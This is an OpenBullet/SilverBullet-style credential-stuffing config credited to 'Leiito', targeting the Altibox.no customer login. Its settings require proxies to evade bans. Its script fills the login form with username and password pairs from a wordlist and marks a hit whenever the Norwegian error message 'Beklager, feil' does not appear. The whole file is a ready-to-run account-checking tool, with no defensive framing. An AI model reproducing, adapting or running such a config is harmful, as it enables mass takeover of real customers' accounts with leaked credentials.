[SETTINGS]
{
  "Name": "Altibox.no -Leiito-",
  "SuggestedBots": 5,
  "MaxCPM": 0,
  "LastModified": "2022-01-20T08:11:04.8438556-08:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Leiito",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Altibox",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
BROWSERACTION Open 

BROWSERACTION ClearCookies 

NAVIGATE "https://www.altibox.no/" 

ELEMENTACTION XPath "/html/body/div[1]/div[1]/div/div[1]/div[2]/button[2]" 
  Click 

BROWSERACTION Maximize 

ELEMENTACTION XPath "/html/body/header/nav[2]/div/div/div[2]/div/div[1]/ul/li/a" 
  Click 

ELEMENTACTION XPath "/html/body/table/tbody/tr/td/div/div[2]/div[2]/div/div[3]/div/form/p/input" 
  WaitForElement 

ELEMENTACTION XPath "/html/body/table/tbody/tr/td/div/div[2]/div[2]/div/div[3]/div/form/p/input" 
  SendKeys "<USER>" 

ELEMENTACTION XPath "/html/body/table/tbody/tr/td/div/div[2]/div[2]/div/div[3]/div/form/p/div[2]/div[1]/input[1]" 
  SendKeys "<PASS>" 

ELEMENTACTION XPath "/html/body/table/tbody/tr/td/div/div[2]/div[2]/div/div[3]/div/form/div/span/input" 
  Click 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Beklager, feil" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "Beklager, feil" 

FUNCTION Constant "Author Leiito" -> CAP "Author Leiito" 

